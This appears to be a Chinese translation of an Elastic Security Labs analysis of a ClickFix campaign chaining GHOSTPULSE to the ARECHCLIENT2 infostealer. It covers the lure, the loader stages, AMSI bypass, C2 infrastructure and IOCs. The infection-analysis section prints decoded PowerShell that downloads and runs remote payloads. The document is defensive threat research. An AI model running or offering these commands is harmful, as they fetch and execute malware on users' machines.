前言
Elastic Security Labs 发现 ClickFix 技术在通过社会工程策略传播各种恶意软件的多阶段活动中越来越受欢迎。
我们的威胁情报表明,利用ClickFix (首次观察到的技术)作为主要初始访问媒介的活动大幅增加。这种社会工程技术诱骗用户复制和粘贴恶意 PowerShell,从而导致恶意软件执行。我们的遥测技术自去年以来一直在追踪它的使用情况,包括导致部署新版本GHOSTPULSE 加载程序的实例。这导致了使用恶意软件和信息窃取程序针对广泛受众的攻击活动,例如LUMMA和ARECHCLIENT2 ,这两个恶意软件家族最早在 2019 中被发现,但现在人气大幅飙升。
这篇文章研究了最近的 ClickFix 活动,对其组件、所采用的技术以及最终传播的恶意软件进行了深入分析。
关键要点
- ClickFix:仍然是一种非常有效且流行的初始访问方法。
- GHOSTPULSE:继续被广泛用作多级有效载荷加载器,并不断开发新模块和改进的规避技术。值得注意的是,它的初始配置是在加密文件中提供的。
- ARECHCLIENT2(SECTOPRAT): 2025 年全年恶意活动显著增加。
最初的诱饵:解构 ClickFix 的社会工程学
每一次成功的多阶段攻击都始于一个立足点,在最近的许多活动中,ClickFix 已经满足了这一初始步骤。ClickFix 利用人类心理学,将看似无害的用户交互转变为妥协的启动平台。
从本质上讲,ClickFix 是一种社会工程技术,旨在操纵用户在其系统上无意中执行恶意代码。它利用常见的在线行为和心理倾向,向用户提供欺骗性提示——通常伪装成浏览器更新、系统错误,甚至是 CAPTCHA 验证。这个技巧很简单,但却非常有效:用户不需要直接下载,而是复制一个看似无害的“修复程序”(这是一个恶意的 PowerShell 命令)并将其直接粘贴到操作系统的运行对话框中。由于该过程是由用户发起的,因此这种看似自愿的行为绕过了许多传统的周边防御措施。
ClickFix 于 2024 年 3 月首次出现在威胁视野中,但它迅速受到关注,在 2024 期间呈爆炸式增长,并在 2025 年继续保持强劲上升势头。它的有效性在于利用“验证疲劳”——用户潜意识中养成的无意识点击安全检查的习惯。当遇到熟悉的验证码或紧急的“修复”按钮时,许多用户由于习惯于常规操作,只是简单地遵从,而不会仔细检查底层请求。这使得ClickFix成为一种极其强大的初始访问向量,由于其突破初始防御的成功率高,受到广泛威胁行为者的青睐。
我们最近在 Elastic Security 上对EDDIESTEALER进行的研究提供了ClickFix在促进恶意软件部署方面的有效性的另一个具体例子,进一步强调了其多功能性和在威胁形势中的广泛采用。
Elastic 的内部遥测证实了这一趋势,显示我们观察到的环境中与 ClickFix 相关的警报数量相当可观,尤其是在 2025 年第一季度。我们注意到,与上一季度相比,尝试次数有所增加,主要集中在部署大规模感染恶意软件,例如 RAT 和 InfoStealers。
ClickFix 活动走向 ARECHCLIENT2 的历程
ClickFix技术通常作为更大规模、多阶段攻击的初始步骤。我们最近分析了一项活动,它清楚地显示了这一进展。此操作以ClickFix诱饵开始,诱骗用户启动感染过程。获得初始访问权限后,该活动部署了GHOSTPULSE加载器的更新版本(也称为HIJACKLOADER 、 IDATLOADER )。然后,该加载器引入一个中间 .NET 加载器。这个额外的阶段负责传递最终的有效载荷: ARECHCLIENT2 ( SECTOPRAT )样本,直接加载到内存中。这个特定的攻击链展示了对手如何将社会工程学与隐藏的加载器功能和多层执行结合起来窃取数据并最终获得远程控制。
我们在遥测中观察到了这一确切的活动,这让我们能够直接了解其在现实世界中的执行情况及其组件的顺序。
感染技术分析
感染链始于模仿 Cloudflare 反 DDoS Captcha 验证的网络钓鱼页面。
我们观察到两个基础架构(均解析为50.57.243[.]90 ) https://clients[.]dealeronlinemarketing[[.]]com/captcha/和https://clients[.]contology[.]com/captcha/传递相同的初始有效负载。
该页面上的用户交互启动执行。GHOSTPULSE 是此活动中的恶意软件加载器。Elastic 安全实验室一直在密切跟踪此加载程序,我们之前的研究( 2023 年和2024 年)对其初始功能进行了详细的了解。
该网页是一个高度混淆的 JavaScript 脚本,可生成 HTML 代码和 JavaScript,并将 PowerShell 命令复制到剪贴板。
在浏览器中检查运行时 HTML 代码,我们可以看到页面的前端,但看不到单击复选框后运行的脚本 Verify you are human.
一个简单的解决方案是在调试器中运行它以在执行期间检索信息。第二段 JS 代码经过了混淆,但我们可以轻松识别出两个有趣的函数。第一个函数runClickedCheckboxEffects通过查询https://api.ipify[.]org?format=json,检索机器的公共 IP 地址,然后将 IP 地址发送到攻击者的基础设施https://koonenmagaziner[.]click/counter/<IP_address>,以记录感染。
第二个函数将 base64 编码的 PowerShell 命令复制到剪贴板。
经过 base64 解码后结果如下
(Invoke-webrequest -URI 'https://shorter[.]me/XOWyT'
-UseBasicParsing).content | iex执行时,它会获取以下 PowerShell 脚本:
Invoke-WebRequest -Uri "https://bitly[.]cx/iddD" -OutFile
"$env:TEMP\ComponentStyle.zip"; Expand-Archive -Path
"$env:TEMP/ComponentStyle.zip" -DestinationPath
"$env:TEMP"; & "$env:TEMP\crystall\Crysta_x86.exe"此次活动观察到的感染过程涉及GHOSTPULSE的部署,如下所示:在用户执行ClickFix复制的 PowerShell 命令后,初始脚本将获取并运行其他命令。这些 PowerShell命令从远程位置下载一个 ZIP 文件( ComponentStyle.zip ),然后将其提取到受害者系统上的临时目录中。
提取的内容包括GHOSTPULSE的组件,具体来说是一个良性可执行文件 ( Crysta_X64.exe ) 和一个恶意动态链接库 ( DllXDownloadManager.dll )。此设置利用了DLL 侧加载,即合法可执行文件加载恶意DLL 的技术。文件 ( Heeschamjet.rc ) 是IDAT文件,其中包含加密格式的下一阶段的有效载荷
以及加密的文件Shonomteak.bxi, ,加载器使用它来获取阶段 2 和配置结构。
GHOSTPULSE
阶段 1
GHOSTPULSE是一种可追溯至 2023 年的恶意软件。它不断收到大量更新,包括一种通过将有效载荷嵌入 PNG 像素中来将其加密有效载荷存储在图像中的新方法(如Elastic 的 2024 研究博客文章中所述)以及来自Zscaler 研究的新模块。
此次活动中使用的恶意软件附带了一个名为Shonomteak.bxi的附加加密文件。在加载程序的阶段 1 期间,它使用 DWORD 加法运算和存储在文件本身中的值来解密文件。
然后,恶意软件从解密文件 Shonomteak.bxi 中提取阶段 2 代码,并使用LibraryLoadA函数将其注入到加载的库中。库名称存储在同一个解密文件中;在我们的例子中,它是vssapi.dll 。
然后使用包含 IDAT PNG 文件名的结构参数、解密的Shonomteak.bxi,内的阶段 2 配置以及在本例中设置为True布尔字段b_detect_process调用阶段 2 函数。
阶段 2
当布尔字段b_detect_process设置为 True 时,恶意软件会执行一个函数来检查进程列表以查看它们是否正在运行。如果检测到进程,则执行将延迟 5 秒。
在之前的样本中,我们分析了 GHOSTPULSE,它的配置直接硬编码在二进制文件中。另一方面,此样本包含恶意软件正常运行所需的所有必要信息,存储在Shonomteak.bxi,中,包括:
- DLL 名称和 Windows API 的哈希值
- IDAT标签:用于查找PNG文件中加密数据的起始位置
- IDAT 字符串:即“IDAT”
- 要扫描的进程哈希值
关于 GHOSTPULSE 的最终想法
GHOSTPULSE 已多次更新。使用 IDAT 标头方法来存储加密的有效载荷,而不是我们在 2024 年发现的利用像素来存储有效载荷的新方法,这可能表明该家族的构建者保留了编译新样本的两种选项。
我们的配置提取器使用这两种方法执行有效载荷提取,并可用于样品的质量分析。您可以在我们的实验室发布存储库中找到更新的工具。
ARECHCLENT2
2025 年,涉及 ARECHCLIENT2(SectopRAT)的活动明显增加。这个高度混淆的 .NET 远程访问工具最初于 2019 年 11 月被发现,以其信息窃取功能而闻名,目前正由 GHOSTPULSE 通过 Clickfix 社会工程技术进行部署。我们之前的研究记录了 GHOSTPULSE 在 2023 年左右利用 ARECHCLIENT2 的初步部署。
GHOSTPULSE 在新创建的进程中部署的有效载荷是一个 x86 本机 .NET 加载器,它反过来加载 ARECHCLIENT2。
加载器经过 3 步骤:
- 修补 AMSI
- 提取并解密有效载荷
- 加载 CLR,然后反射加载 ARECHCLIENT2
有趣的是,其用于调试目的的错误处理仍然存在,以使用MessageBoxA API 的消息框的形式,例如,当找不到.tls部分时,会显示带有字符串"D1"的错误消息框。
以下是所有错误消息及其描述的表格:
| Message | 描述 |
|---|---|
| F1 | LoadLibraryExW 挂钩失败 |
| F2 | AMSI 修补失败 |
| D1 | 无法找到.tls部分 |
| W2 | 无法加载 CLR |
该恶意软件在LoadLibraryExW API 上设置了一个钩子。此钩子等待amsi.dll加载,然后在AmsiScanBuffer 0上设置另一个钩子,从而有效地绕过 AMSI。
此后,加载器通过解析 PE 头来获取内存中指向.tls部分的指针。该部分的前0x40字节用作 XOR 密钥,其余字节包含加密的 ARECHCLIENT2 样本,然后由加载程序解密。
最后,它使用CLRCreateInstance Windows API 在内存中加载 .NET 公共语言运行时 (CLR),然后反射加载 ARECHCLIENT2。以下是其执行方式的示例。
ARECHCLIENT2 是一种强大的远程访问木马和信息窃取程序,旨在针对广泛的敏感用户数据和系统信息。该恶意软件的核心目标主要集中在:
- 凭证和财务盗窃: ARECHCLIENT2 明确针对加密货币钱包、浏览器保存的密码、cookie 和自动填充数据。它还旨在获取来自 FTP、VPN、Telegram、Discord 和 Steam 的凭证。
- 系统分析和侦察: ARECHCLIENT2 收集大量系统详细信息,包括操作系统版本、硬件信息、IP 地址、机器名称和地理位置(城市、国家和时区)。
- 命令执行: ARECHCLIENT2 从其命令和控制 (C2) 服务器接收并执行命令,从而授予攻击者对受感染系统的远程控制权。
ARECHCLIENT2恶意软件连接到其 C2 144.172.97[.]2,该 C2 在二进制文件中以加密字符串的形式硬编码),并且还从硬编码的 pastebin 链接https://pastebin[.]com/raw/Wg8DHh2x中检索其辅助 C2( 143.110.230[.]167 )IP。
基础设施分析
该恶意验证码页面托管在两个域clients.dealeronlinemarketing[.]com和clients.contology[.]com下,URI 分别为/captcha和/Client ,指向以下 IP 地址50.57.243[.]90 。
我们发现这两个实体都与一家拥有悠久运营历史的数字广告代理商有关联。进一步调查显示,该公司一直利用客户子域名托管各种内容,包括 PDF 和表格,以用于广告目的。
我们评估攻击者可能已经入侵了服务器50.57.243[.]90 ,并利用该公司现有的基础设施和广告覆盖范围来促进大范围的恶意活动。
沿着攻击链进一步分析,对 ARECHCLIENT2 C2 IP( 143.110.230[.]167和144.172.97[.]2 )的分析发现了其他攻击活动基础设施。两台服务器托管在不同的自治系统 AS14061 和 AS14956 上。
通过对共享横幅哈希值( @ValidinLLC的HOST-BANNER_0_HASH ,即 Web 服务器响应横幅的哈希值)进行分析,我们发现过去七个月内,一系列自治系统中有 120 唯一服务器。在这 120 个中, 19 之前已被其他供应商标记为“Sectop RAT”(又名 ARECHCLIENT2),如Maltrail repo中所述。
对最近发生的事件(6 月1 、 2025之后的第一次发生)根据 VirusTotal 进行重点验证,结果显示社区成员之前已将所有 13 标记为 Sectop RAT C2。
所有这些服务器都有类似的配置:
- 运行 Canonical Linux
- SSH 开启
22 - 未知 TCP 开启
443 8080上的 Nginx HTTP,以及9000上的 HTTP(C2 端口)
端口9000上的服务具有 Windows 服务器标头,而 SSH 和 NGINX HTTP 服务均指定 Ubuntu 作为操作系统。这表明 C2 的反向代理可以通过维护一次性前端重定向器来保护实际服务器。
ARECHCLIENT2 IOC:
HOST-BANNER_0_HASH: 82cddf3a9bff315d8fc708e5f5f85f20
这是一场积极的运动,在过去的七个月里,这个基础设施正在以高节奏建设和拆除。截至本文发布时,以下 C2 节点仍处于活动状态:
| Value | First Seen | 最后看到时间 |
|---|---|---|
66.63.187.22 | 2025年6月15日 | 2025年6月15日 |
45.94.47.164 | 2025年6月2日 | 2025年6月15日 |
84.200.17.129 | 2025年6月4日 | 2025年6月15日 |
82.117.255.225 | 2025年3月14日 | 2025年6月15日 |
45.77.154.115 | 2025年6月5日 | 2025年6月15日 |
144.172.94.120 | 2025年5月20日 | 2025年6月15日 |
79.124.62.10 | 2025年5月15日 | 2025年6月15日 |
82.117.242.178 | 2025年3月14日 | 2025年6月15日 |
195.82.147.132 | 2025年4月10日 | 2025年6月15日 |
62.60.247.154 | 2025年5月18日 | 2025年6月15日 |
91.199.163.74 | 2025年4月3日 | 2025年6月15日 |
172.86.72.81 | 2025年3月13日 | 2025年6月15日 |
107.189.24.67 | 2025年6月2日 | 2025年6月15日 |
143.110.230.167 | 2025年6月8日 | 2025年6月15日 |
185.156.72.80 | 2025年5月15日 | 2025年6月15日 |
85.158.110.179 | 2025年5月11日 | 2025年6月15日 |
144.172.101.228 | 2025年5月13日 | 2025年6月15日 |
192.124.178.244 | 2025年6月1日 | 2025年6月15日 |
107.189.18.56 | 2025年4月27日 | 2025年6月15日 |
194.87.29.62 | 2025年5月18日 | 2025年6月15日 |
185.156.72.63 | 2025年6月12日 | 2025年6月12日 |
193.149.176.31 | 2025年6月8日 | 2025年6月12日 |
45.141.87.249 | 2025年6月12日 | 2025年6月12日 |
176.126.163.56 | 2025年5月6日 | 2025年6月12日 |
185.156.72.71 | 2025年5月15日 | 2025年6月12日 |
91.184.242.37 | 2025年5月15日 | 2025年6月12日 |
45.141.86.159 | 2025年5月15日 | 2025年6月12日 |
67.220.72.124 | 2025年6月5日 | 2025年6月12日 |
45.118.248.29 | 2025年1月28日 | 2025年6月12日 |
172.105.148.233 | 2025年6月3日 | 2025年6月10日 |
194.26.27.10 | 2025年5月6日 | 2025年6月10日 |
45.141.87.212 | 2025年6月8日 | 2025年6月8日 |
45.141.86.149 | 2025年5月15日 | 2025年6月8日 |
172.235.190.176 | 2025年6月8日 | 2025年6月8日 |
45.141.86.82 | 2024年12月13日 | 2025年6月8日 |
45.141.87.7 | 2025年5月13日 | 2025年6月6日 |
185.125.50.140 | 2025年4月6日 | 2025年6月3日 |
结论
此次多阶段网络攻击活动有效地利用了 ClickFix 社会工程学进行初始访问,部署了GHOSTPULSE加载程序来提供中间 .NET 加载程序,最终形成了驻留在内存中的ARECHCLIENT2有效载荷。这个分层的攻击链收集了大量凭证、财务和系统数据,同时还赋予攻击者对受感染机器的远程控制能力。
MITRE ATT&CK
Elastic 使用MITRE ATT&CK框架来记录高级持续性威胁针对企业网络使用的常见策略、技术和程序。
战术
策略代表了技术或子技术的原因。 这是对手的战术目标:采取行动的原因。
技术
技术代表对手如何通过采取行动来实现战术目标。
检测[恶意软件]
检测
Elastic Defend 使用以下行为保护规则检测此威胁:
雅拉
观察结果
本研究讨论了以下可观察的结果。
| 可观测 | 类型 | 名称 | 参考 |
|---|---|---|---|
clients.dealeronlinemarketing[.]com | 域 | 验证码子域名 | |
clients.contology[.]com | 域 | 验证码子域名 | |
koonenmagaziner[.]click | 域 | ||
50.57.243[.]90 | IPv4 地址 | clients.dealeronlinemarketing[.]com & clients.contology[.]com IP 地址 | |
144.172.97[.]2 | IPv4 地址 | ARECHCLIENT2 C&C 服务器 | |
143.110.230[.]167 | IPv4 地址 | ARECHCLIENT2 C&C 服务器 | |
pastebin[.]com/raw/Wg8DHh2x | IPv4 地址 | 包含ARECHCLIENT2 C&C服务器IP | |
2ec47cbe6d03e6bdcccc63c936d1c8310c261755ae5485295fecac4836d7e56a | SHA-256 | DivXDownloadManager.dll | GHOSTPULSE |
a8ba1e14249cdd9d806ef2d56bedd5fb09de920b6f78082d1af3634f4c136b90 | SHA-256 | Heeschamjiet.rc | PNG幽灵脉冲 |
f92b491d63bb77ed3b4c7741c8c15bdb7c44409f1f850c08dce170f5c8712d55 | SHA-256 | DOTNET 加载器 | |
4dc5ba5014628ad0c85f6e8903de4dd3b49fed65796978988df8c128ba7e7de9 | SHA-256 | ARECHCLENT2 |
参考资料
上述研究参考了以下内容: